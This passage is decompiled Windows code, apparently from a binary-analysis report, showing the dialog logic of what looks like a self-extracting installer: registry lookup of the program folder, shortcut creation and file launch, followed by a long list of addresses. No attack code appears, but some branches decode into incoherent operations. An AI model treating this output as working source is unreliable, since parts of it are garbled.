												 *((intOrPtr*)(_t296 - 0x38)) = _t296 - 0x5d50;
												_push(_t296 - 0x40);
												 *0xa62074();
												goto L16;
											}
											L13:
											_t273 = E00A23883(_t296 - 0x1108);
											__eflags = _t295 - _t273;
											if(_t295 > _t273) {
												goto L15;
											}
											goto L14;
										}
										L24:
										 *(_t296 - 4) =  *(_t296 - 4) | 0xffffffff;
										E00A0A6A6(_t296 - 0x8d58);
									}
									goto L174;
								case 1:
									L25:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax = E00A23883(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0xa5dc84);
										__eax = E00A238AE(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											__eax = E00A27458(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L00A2389E(__esi);
										}
									}
									goto L174;
								case 2:
									L39:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x3508 = SetWindowTextW( *(__ebp + 8), __ebp - 0x3508);
									}
									goto L174;
								case 3:
									L41:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L174;
									}
									L42:
									__eflags =  *0xa4a472 - __di;
									if( *0xa4a472 != __di) {
										goto L174;
									}
									L43:
									__eax = 0;
									__edi = __ebp - 0x3508;
									_push(0x22);
									 *(__ebp - 0x1108) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x3508) - __ax;
									if( *(__ebp - 0x3508) == __ax) {
										__edi = __ebp - 0x3506;
									}
									__eax = E00A23883(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L174;
									} else {
										L46:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L50:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L62:
												__ebp - 0x1108 = E00A10131(__ebp - 0x1108, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L63:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x1108;
												__eax = E00A21A6B(__ebp - 0x1108, __ebp - 0x1108);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *(__eax + 2) - __bx;
													if( *(__eax + 2) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x1108;
												__edi = 0xa4a472;
												E00A10131(0xa4a472, __ebp - 0x1108, __esi) = __ebp - 0x1108;
												__eax = E00A1AB60(__ebp - 0x1108, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x1108 = SetWindowTextW(__esi, __ebp - 0x1108); // executed
												__eax = SendMessageW(__esi, 0x143, __ebx, 0xa4a472); // executed
												__eax = __ebp - 0x1108;
												__eax = E00A238B9(__ebp - 0x1108, 0xa4a472, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x1108 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1108);
												}
												goto L174;
											}
											L51:
											__eflags = __ax;
											if(__ax == 0) {
												L53:
												__eax = __ebp - 0x1c;
												__ebx = 0;
												_push(__ebp - 0x1c);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0xa62028();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x1108;
													_push(__ebp - 0x1108);
													__eax = __ebp - 0x20;
													_push(__ebp - 0x20);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x1c));
													__eax =  *0xa62024();
													_push( *(__ebp - 0x1c));
													 *0xa62004() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *((short*)(__ebp + __eax * 2 - 0x1108)) = __cx;
												}
												__eflags =  *(__ebp - 0x1108) - __bx;
												if( *(__ebp - 0x1108) != __bx) {
													__eax = __ebp - 0x1108;
													__eax = E00A23883(__ebp - 0x1108);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x110a)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x1108 = E00A10109(__eflags, __ebp - 0x1108, "\\", __esi);
													}
												}
												__esi = E00A23883(__edi);
												__eax = __ebp - 0x1108;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x1108 = E00A10109(__eflags, __ebp - 0x1108, __edi, 0x800);
												}
												goto L63;
											}
											L52:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L62;
											}
											goto L53;
										}
										L47:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L50;
										}
										L48:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L174;
										} else {
											__ebp - 0x1108 = E00A10131(__ebp - 0x1108, __edi, 0x800);
											goto L63;
										}
									}
								case 4:
									L68:
									__eflags =  *0xa4a46c - 1;
									__eflags = __eax - 0xa4a46c;
									 *__edi =  *__edi + __ecx;
									__eflags =  *(__ebx + 7) & __al;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L73:
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0xa48453 = __cl;
										 *0xa48460 = 1;
										goto L174;
									}
									L74:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L78:
										 *0xa48453 = __cl;
										L79:
										 *0xa48460 = __cl;
										goto L174;
									}
									L75:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L80;
									}
									L76:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L174;
									}
									L77:
									 *0xa48453 = 1;
									goto L79;
								case 6:
									L86:
									__edi = 0;
									 *0xa5ec98 = 1;
									__edi = 1;
									__ebx = __ebp - 0x3508;
									__eflags =  *(__ebp - 0x3508) - 0x3c;
									if( *(__ebp - 0x3508) != 0x3c) {
										L97:
										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
										if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
											L100:
											__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
											if( *((intOrPtr*)(__ebp + 0x10)) == 4) {
												__eflags = __esi - 6;
												if(__esi == 6) {
													__eax = E00A1D0DF(__ebp,  *(__ebp + 8), __ebx, __edi, 0);
												}
											}
											goto L174;
										}
										L98:
										__eflags = __esi - 9;
										if(__esi != 9) {
											goto L174;
										}
										L99:
										__eax = E00A1D0DF(__ebp,  *(__ebp + 8), __ebx, __edi, 1);
										goto L100;
									}
									L87:
									__eax = __ebp - 0x3506;
									_push(0x3e);
									_push(__ebp - 0x3506);
									__eax = E00A2181A(__ecx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										goto L97;
									}
									L88:
									_t102 = __eax + 2; // 0x2
									__ecx = _t102;
									 *(__ebp - 0x14) = _t102;
									__ecx = 0;
									__eflags = 0;
									 *__eax = __cx;
									__eax = __ebp - 0x108;
									_push(0x64);
									_push(__ebp - 0x108);
									__eax = __ebp - 0x3506;
									_push(__ebp - 0x3506);
									while(1) {
										L89:
										__ebx = E00A1A957();
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										}
										L90:
										__eflags =  *(__ebp - 0x108);
										if( *(__ebp - 0x108) == 0) {
											break;
										}
										L91:
										__eax = __ebp - 0x108;
										__eax = E00A11AC4(__ebp - 0x108, L"HIDE");
										__eax =  ~__eax;
										asm("sbb eax, eax");
										__edi = __edi & __eax;
										__eax = __ebp - 0x108;
										__eax = E00A11AC4(__ebp - 0x108, L"MAX");
										__eflags = __eax;
										if(__eax == 0) {
											_push(3);
											_pop(__edi);
										}
										__eax = __ebp - 0x108;
										__eax = E00A11AC4(__ebp - 0x108, L"MIN");
										__eflags = __eax;
										if(__eax == 0) {
											_push(6);
											_pop(__edi);
										}
										_push(0x64);
										__eax = __ebp - 0x108;
										_push(__ebp - 0x108);
										_push(__ebx);
									}
									L96:
									__ebx =  *(__ebp - 0x14);
									goto L97;
								case 7:
									goto L0;
								case 8:
									L126:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x3508) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x3508;
											_push(__ebp - 0x3508);
											__eax = E00A273F7(__ebx, __edi);
											_pop(__ecx);
											 *0xa5ec94 = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0xa5ec90 = E00A1AE2A(__ecx, __edx, __eflags);
									}
									 *0xa56b7b = 1;
									goto L174;
								case 9:
									L131:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L174;
									}
									L132:
									__eax = 0;
									 *(__ebp - 0x4d08) = __ax;
									__eax =  *(__ebp - 0x1bd58) & 0x0000ffff;
									__eax = E00A26710( *(__ebp - 0x1bd58) & 0x0000ffff);
									__esi = 0x800;
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0xa5bb82);
										__eax = __ebp - 0x4d08;
										_push(__ebp - 0x4d08);
										__eax = E00A10131();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x4d08;
										if(__eflags == 0) {
											_push(0xa5ab82);
											_push(__eax);
											__eax = E00A10131();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0xa5cb82);
											_push(__eax);
											__eax = E00A10131();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9d58) = __ax;
									 *(__ebp - 0x3d08) = __ax;
									__ebp - 0x19d58 = __ebp - 0x6d50;
									__eax = E00A10131(__ebp - 0x6d50, __ebp - 0x19d58, __esi);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6d50) - __bx;
									if( *(__ebp - 0x6d50) != __bx) {
										L140:
										__ebp - 0x6d50 = E00A0A373(__ebp - 0x6d50);
										__eflags = __al;
										if(__al != 0) {
											L158:
											__edi = 0x800;
											goto L159;
										}
										L141:
										__ebx = __edi;
										__esi = __ebp - 0x6d50;
										__eflags =  *(__ebp - 0x6d50) - __bx;
										if( *(__ebp - 0x6d50) == __bx) {
											goto L158;
										}
										L142:
										_push(0x20);
										_pop(__ecx);
										do {
											L143:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L145:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6d50 = E00A0A373(__ebp - 0x6d50);
												__eflags = __al;
												if(__al == 0) {
													L153:
													__esi->i = __di;
													L154:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L155;
												}
												L146:
												__ebp - 0x6d50 = E00A0A387(__ebp - 0x6d50);
												__eax = E00A0A3D5(__eax);
												__eflags = __al;
												if(__al != 0) {
													goto L153;
												}
												L147:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
												if(__di != __ax) {
													L149:
													_push(0x20);
													_pop(__eax);
													do {
														L150:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(0x400);
													_push(__esi);
													__eax = __ebp - 0x3d08;
													L152:
													_push(__eax);
													__eax = E00A10131();
													 *__ebx = __di;
													goto L154;
												}
												L148:
												 *(__ebp - 0x3d08) = __ax;
												__eax =  &(__esi->i);
												_push(0x3ff);
												_push( &(__esi->i));
												__eax = __ebp - 0x3d06;
												goto L152;
											}
											L144:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L155;
											}
											goto L145;
											L155:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__edi = 0x800;
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											 *__ebx = __ax;
										}
										goto L159;
									} else {
										L138:
										__edi = 0x800;
										__ebp - 0x19d56 = __ebp - 0x6d50;
										E00A10131(__ebp - 0x6d50, __ebp - 0x19d56, 0x800) = __ebp - 0x6d4e;
										_push(__ebx);
										_push(__ebp - 0x6d4e);
										__eax = E00A2181A(__ecx);
										_pop(__ecx);
										_pop(__ecx);
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x3d08 = E00A10131(__ebp - 0x3d08, __ebp - 0x3d08, 0x400);
										}
										L159:
										__eflags =  *((short*)(__ebp - 0x11d58));
										if( *((short*)(__ebp - 0x11d58)) != 0) {
											__ebp - 0x9d58 = __ebp - 0x11d58;
											__eax = E00A0B429(__ebp - 0x11d58, __ebp - 0x9d58, __edi);
										}
										__ebp - 0xbd58 = __ebp - 0x6d50;
										__eax = E00A0B429(__ebp - 0x6d50, __ebp - 0xbd58, __edi);
										__eflags =  *(__ebp - 0x4d08);
										if(__eflags == 0) {
											__ebp - 0x4d08 = E00A1ADBE(__ecx, __ebp - 0x4d08,  *(__ebp - 0x14));
										}
										__ebp - 0x4d08 = E00A0B3F7(__eflags, __ebp - 0x4d08, __edi);
										__eflags =  *((short*)(__ebp - 0x17d58));
										if(__eflags != 0) {
											__ebp - 0x17d58 = __ebp - 0x4d08;
											E00A10109(__eflags, __ebp - 0x4d08, __ebp - 0x17d58, __edi) = __ebp - 0x4d08;
											__eax = E00A0B3F7(__eflags, __ebp - 0x4d08, __edi);
										}
										__ebp - 0x4d08 = __ebp - 0xcd58;
										__eax = E00A10131(__ebp - 0xcd58, __ebp - 0x4d08, __edi);
										__eflags =  *(__ebp - 0x13d58);
										__eax = __ebp - 0x13d58;
										if(__eflags == 0) {
											__eax = __ebp - 0x19d58;
										}
										__ebp - 0x4d08 = E00A10109(__eflags, __ebp - 0x4d08, __ebp - 0x4d08, __edi);
										__eax = __ebp - 0x4d08;
										__eflags = E00A0B683(__ebp - 0x4d08);
										if(__eflags == 0) {
											L169:
											__ebp - 0x4d08 = E00A10109(__eflags, __ebp - 0x4d08, L".lnk", __edi);
											goto L170;
										} else {
											L168:
											__eflags = __eax;
											if(__eflags == 0) {
												L170:
												__ebx = 0;
												__ebp - 0x4d08 = E00A0A1EF(__ecx, __ebp, __ebp - 0x4d08, 1, 0);
												__ebp - 0xbd58 = __ebp - 0xad58;
												E00A10131(__ebp - 0xad58, __ebp - 0xbd58, __edi) = __ebp - 0xad58;
												__eax = E00A0BED3(__eflags, __ebp - 0xad58);
												__ecx =  *(__ebp - 0x3d08) & 0x0000ffff;
												__eax = __ebp - 0x3d08;
												__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff);
												__edx = __ebp - 0x9d58;
												__esi = __ebp - 0xad58;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08;
												 *(__ebp - 0x9d58) & 0x0000ffff =  ~( *(__ebp - 0x9d58) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58;
												 *(__ebp - 0xad58) & 0x0000ffff =  ~( *(__ebp - 0xad58) & 0x0000ffff);
												__eax = __ebp - 0x15d58;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi;
												E00A1A874(__ebp - 0x15d58) = __ebp - 0x4d08;
												__ebp - 0xbd58 = E00A19E3C(__ecx, 0, __ebp - 0xbd58, __ebp - 0x4d08,  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi, __ebp - 0xbd58,  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58,  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08);
												__eflags =  *(__ebp - 0xcd58) - __bx;
												if( *(__ebp - 0xcd58) != __bx) {
													_push(0);
													__eax = __ebp - 0xcd58;
													_push(__ebp - 0xcd58);
													_push(5);
													_push(0x1000);
													__eax =  *0xa62078();
												}
												goto L174;
											}
											goto L169;
										}
									}
								case 0xa:
									L172:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0xa4a470 = 1;
									}
									goto L174;
								case 0xb:
									L81:
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__eax = E00A26710( *(__ebp - 0x3508) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0xa48461 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0xa48462 = 1;
										} else {
											__eax = 0;
											 *0xa48461 = __al;
											 *0xa48462 = __al;
										}
									}
									goto L174;
								case 0xc:
									L103:
									 *0xa5ec99 = 1;
									__eax = __eax + 0xa5ec99;
									_t116 = __esi + 0x39;
									 *_t116 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t116;
									__ebp = 0xffffcaf8;
									if( *_t116 != 0) {
										_t118 = __ebp - 0x3508; // 0xffff95f0
										__eax = _t118;
										_push(_t118);
										 *0xa3e5fc = E00A11AB0();
									}
									goto L174;
							}
							L2:
							_push(0x1000);
							_push(_t291);
							_push(_t223);
							_t223 = E00A1A957();
							_t291 = _t291 + 0x2000;
							_t288 = _t288 - 1;
							if(_t288 != 0) {
								goto L2;
							} else {
								_t292 = _t288;
								goto L4;
							}
						}
						L175:
						 *[fs:0x0] =  *((intOrPtr*)(_t296 - 0xc));
						return _t222;
					}
					L110:
					__eflags =  *0xa56b7a;
					if( *0xa56b7a != 0) {
						goto L174;
					}
					L111:
					__eax = 0;
					 *(__ebp - 0x1508) = __ax;
					__eax = __ebp - 0x3508;
					_push(__ebp - 0x3508);
					__eax = E00A2181A(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L118:
						__eflags =  *(__ebp - 0x1508);
						if( *(__ebp - 0x1508) == 0) {
							__ebp - 0x1bd58 = __ebp - 0x3508;
							E00A10131(__ebp - 0x3508, __ebp - 0x1bd58, 0x1000) = __ebp - 0x19d58;
							__ebp - 0x1508 = E00A10131(__ebp - 0x1508, __ebp - 0x19d58, 0x200);
						}
						__ebp - 0x3508 = E00A1A782(__ebp - 0x3508);
						__eax = 0;
						 *(__ebp - 0x2508) = __ax;
						__ebp - 0x1508 = __ebp - 0x3508;
						__eax = E00A1A195( *(__ebp + 8), __ebp - 0x3508, __ebp - 0x1508, 0x24);
						__eflags = __eax - 6;
						if(__eax == 6) {
							goto L174;
						} else {
							L121:
							__eax = 0;
							__eflags = 0;
							 *0xa48450 = 1;
							 *0xa4946a = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
							goto L122;
						}
					}
					L112:
					__esi = 0;
					__eflags =  *(__ebp - 0x3508) - __dx;
					if( *(__ebp - 0x3508) == __dx) {
						goto L118;
					}
					L113:
					__ecx = 0;
					__eax = __ebp - 0x3508;
					while(1) {
						L114:
						__eflags =  *__eax - 0x40;
						if( *__eax == 0x40) {
							break;
						}
						L115:
						__esi =  &(__esi->i);
						__eax = __ebp - 0x3508;
						__ecx = __esi + __esi;
						__eax = __ebp - 0x3508 + __ecx;
						__eflags =  *__eax - __dx;
						if( *__eax != __dx) {
							continue;
						}
						L116:
						goto L118;
					}
					L117:
					__ebp - 0x3506 = __ebp - 0x3506 + __ecx;
					__ebp - 0x1508 = E00A10131(__ebp - 0x1508, __ebp - 0x3506 + __ecx, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x3508) = __ax;
					goto L118;
					L122:
					__eflags = _t274 - 7;
					if(_t274 == 7) {
						__eflags =  *0xa4a46c;
						if( *0xa4a46c == 0) {
							 *0xa4a46c = 2;
						}
						 *0xa49468 = 1;
					}
					goto L174;
				}
			}










                                                        0x00a1c7c3
                                                        0x00a1c7c3
                                                        0x00a1c7c3
                                                        0x00a1c7c3
                                                        0x00a1c7c6
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c7cc
                                                        0x00a1c7cc
                                                        0x00a1c7d2
                                                        0x00a1c7e0
                                                        0x00a1c7ec
                                                        0x00a1c7ee
                                                        0x00a1c7f0
                                                        0x00a1c7f5
                                                        0x00a1c7f5
                                                        0x00a1c7f5
                                                        0x00a1c80d
                                                        0x00a1c81a
                                                        0x00a1c81f
                                                        0x00a1c821
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c7f3
                                                        0x00a1c7f3
                                                        0x00a1c7f3
                                                        0x00a1c7f4
                                                        0x00a1c7f4
                                                        0x00a1c823
                                                        0x00a1c82d
                                                        0x00a1c833
                                                        0x00a1c83b
                                                        0x00a1cd20
                                                        0x00a1cd20
                                                        0x00a1cd20
                                                        0x00a1cd25
                                                        0x00a1cd29
                                                        0x00a1cd2d
                                                        0x00a1cd34
                                                        0x00a1cd3b
                                                        0x00a1cd3e
                                                        0x00a1cd43
                                                        0x00a1cd46
                                                        0x00a1cd4b
                                                        0x00a1c0db
                                                        0x00a1c0e1
                                                        0x00a1c0e7
                                                        0x00a1c0e7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c101
                                                        0x00a1c118
                                                        0x00a1c11c
                                                        0x00000000
                                                        0x00a1c11e
                                                        0x00000000
                                                        0x00a1c11e
                                                        0x00a1c11c
                                                        0x00a1c123
                                                        0x00a1c126
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c12c
                                                        0x00a1c12c
                                                        0x00000000
                                                        0x00a1c133
                                                        0x00a1c133
                                                        0x00a1c136
                                                        0x00a1c149
                                                        0x00a1c16f
                                                        0x00a1c183
                                                        0x00a1c186
                                                        0x00a1c191
                                                        0x00a1c2d5
                                                        0x00a1c2d5
                                                        0x00a1c2d5
                                                        0x00a1c2dd
                                                        0x00a1c2e3
                                                        0x00a1c2e8
                                                        0x00a1c2ea
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c19b
                                                        0x00a1c1a3
                                                        0x00a1c1a9
                                                        0x00a1c1af
                                                        0x00a1c255
                                                        0x00a1c25c
                                                        0x00a1c262
                                                        0x00a1c265
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c267
                                                        0x00a1c26e
                                                        0x00a1c274
                                                        0x00a1c276
                                                        0x00000000
                                                        0x00a1c278
                                                        0x00a1c278
                                                        0x00a1c27a
                                                        0x00a1c27b
                                                        0x00a1c27f
                                                        0x00a1c293
                                                        0x00a1c298
                                                        0x00a1c2a2
                                                        0x00a1c2a8
                                                        0x00a1c2ab
                                                        0x00a1c27d
                                                        0x00a1c27d
                                                        0x00a1c27e
                                                        0x00000000
                                                        0x00a1c2ad
                                                        0x00a1c2bb
                                                        0x00a1c2c1
                                                        0x00a1c2c3
                                                        0x00a1c2cf
                                                        0x00a1c2cf
                                                        0x00000000
                                                        0x00a1c2c3
                                                        0x00a1c2ab
                                                        0x00a1c276
                                                        0x00a1c1b5
                                                        0x00a1c1c4
                                                        0x00a1c1d1
                                                        0x00a1c1e2
                                                        0x00a1c1e5
                                                        0x00a1c1e8
                                                        0x00a1c1fb
                                                        0x00a1c202
                                                        0x00a1c207
                                                        0x00a1c209
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c20f
                                                        0x00a1c216
                                                        0x00a1c21b
                                                        0x00a1c220
                                                        0x00a1c22c
                                                        0x00a1c231
                                                        0x00a1c234
                                                        0x00a1c23b
                                                        0x00a1c23d
                                                        0x00a1c23e
                                                        0x00a1c248
                                                        0x00a1c24e
                                                        0x00a1c24f
                                                        0x00000000
                                                        0x00a1c24f
                                                        0x00a1c1ea
                                                        0x00a1c1f1
                                                        0x00a1c1f7
                                                        0x00a1c1f9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c1f9
                                                        0x00a1c2f0
                                                        0x00a1c2f0
                                                        0x00a1c2fa
                                                        0x00a1c2fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c304
                                                        0x00a1c304
                                                        0x00a1c306
                                                        0x00a1c359
                                                        0x00a1c35e
                                                        0x00a1c367
                                                        0x00a1c368
                                                        0x00a1c36e
                                                        0x00a1c373
                                                        0x00a1c376
                                                        0x00a1c378
                                                        0x00a1c38a
                                                        0x00a1c38f
                                                        0x00a1c390
                                                        0x00a1c390
                                                        0x00a1c391
                                                        0x00a1c393
                                                        0x00a1c39a
                                                        0x00a1c39f
                                                        0x00a1c393
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c3a5
                                                        0x00a1c3a5
                                                        0x00a1c3a7
                                                        0x00a1c3b7
                                                        0x00a1c3b7
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c3c2
                                                        0x00a1c3c2
                                                        0x00a1c3c4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c3ca
                                                        0x00a1c3ca
                                                        0x00a1c3d1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c3d7
                                                        0x00a1c3d7
                                                        0x00a1c3d9
                                                        0x00a1c3df
                                                        0x00a1c3e1
                                                        0x00a1c3e8
                                                        0x00a1c3e9
                                                        0x00a1c3f0
                                                        0x00a1c3f2
                                                        0x00a1c3f2
                                                        0x00a1c3f9
                                                        0x00a1c3fe
                                                        0x00a1c404
                                                        0x00a1c406
                                                        0x00000000
                                                        0x00a1c40c
                                                        0x00a1c40c
                                                        0x00a1c40c
                                                        0x00a1c40f
                                                        0x00a1c411
                                                        0x00a1c412
                                                        0x00a1c415
                                                        0x00a1c43e
                                                        0x00a1c43e
                                                        0x00a1c441
                                                        0x00a1c526
                                                        0x00a1c52f
                                                        0x00a1c534
                                                        0x00a1c534
                                                        0x00a1c536
                                                        0x00a1c536
                                                        0x00a1c538
                                                        0x00a1c53a
                                                        0x00a1c541
                                                        0x00a1c546
                                                        0x00a1c547
                                                        0x00a1c548
                                                        0x00a1c54a
                                                        0x00a1c54c
                                                        0x00a1c550
                                                        0x00a1c552
                                                        0x00a1c552
                                                        0x00a1c554
                                                        0x00a1c554
                                                        0x00a1c550
                                                        0x00a1c558
                                                        0x00a1c55e
                                                        0x00a1c56b
                                                        0x00a1c572
                                                        0x00a1c582
                                                        0x00a1c58c
                                                        0x00a1c59a
                                                        0x00a1c5a0
                                                        0x00a1c5a8
                                                        0x00a1c5ad
                                                        0x00a1c5ae
                                                        0x00a1c5af
                                                        0x00a1c5b1
                                                        0x00a1c5c5
                                                        0x00a1c5c5
                                                        0x00000000
                                                        0x00a1c5b1
                                                        0x00a1c447
                                                        0x00a1c447
                                                        0x00a1c44a
                                                        0x00a1c457
                                                        0x00a1c457
                                                        0x00a1c45a
                                                        0x00a1c45c
                                                        0x00a1c45d
                                                        0x00a1c45f
                                                        0x00a1c460
                                                        0x00a1c465
                                                        0x00a1c46a
                                                        0x00a1c470
                                                        0x00a1c472
                                                        0x00a1c474
                                                        0x00a1c477
                                                        0x00a1c47e
                                                        0x00a1c47f
                                                        0x00a1c485
                                                        0x00a1c486
                                                        0x00a1c489
                                                        0x00a1c48a
                                                        0x00a1c48b
                                                        0x00a1c490
                                                        0x00a1c493
                                                        0x00a1c499
                                                        0x00a1c4a2
                                                        0x00a1c4a5
                                                        0x00a1c4aa
                                                        0x00a1c4ac
                                                        0x00a1c4ae
                                                        0x00a1c4b0
                                                        0x00a1c4b0
                                                        0x00a1c4b2
                                                        0x00a1c4b2
                                                        0x00a1c4b4
                                                        0x00a1c4b4
                                                        0x00a1c4bc
                                                        0x00a1c4c3
                                                        0x00a1c4c5
                                                        0x00a1c4cc
                                                        0x00a1c4d2
                                                        0x00a1c4d4
                                                        0x00a1c4d5
                                                        0x00a1c4dd
                                                        0x00a1c4ec
                                                        0x00a1c4ec
                                                        0x00a1c4dd
                                                        0x00a1c4f7
                                                        0x00a1c4f9
                                                        0x00a1c508
                                                        0x00a1c50e
                                                        0x00a1c514
                                                        0x00a1c51f
                                                        0x00a1c51f
                                                        0x00000000
                                                        0x00a1c514
                                                        0x00a1c44c
                                                        0x00a1c44c
                                                        0x00a1c451
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c451
                                                        0x00a1c417
                                                        0x00a1c417
                                                        0x00a1c41b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c41d
                                                        0x00a1c41d
                                                        0x00a1c420
                                                        0x00a1c422
                                                        0x00a1c425
                                                        0x00000000
                                                        0x00a1c42b
                                                        0x00a1c434
                                                        0x00000000
                                                        0x00a1c434
                                                        0x00a1c425
                                                        0x00000000
                                                        0x00a1c5d0
                                                        0x00a1c5d0
                                                        0x00a1c5d1
                                                        0x00a1c5d6
                                                        0x00a1c5d8
                                                        0x00a1c5db
                                                        0x00a1c5db
                                                        0x00000000
                                                        0x00a1c611
                                                        0x00a1c611
                                                        0x00a1c618
                                                        0x00a1c61a
                                                        0x00a1c61a
                                                        0x00a1c61c
                                                        0x00a1c64b
                                                        0x00a1c64b
                                                        0x00a1c651
                                                        0x00000000
                                                        0x00a1c651
                                                        0x00a1c61e
                                                        0x00a1c61e
                                                        0x00a1c61e
                                                        0x00a1c621
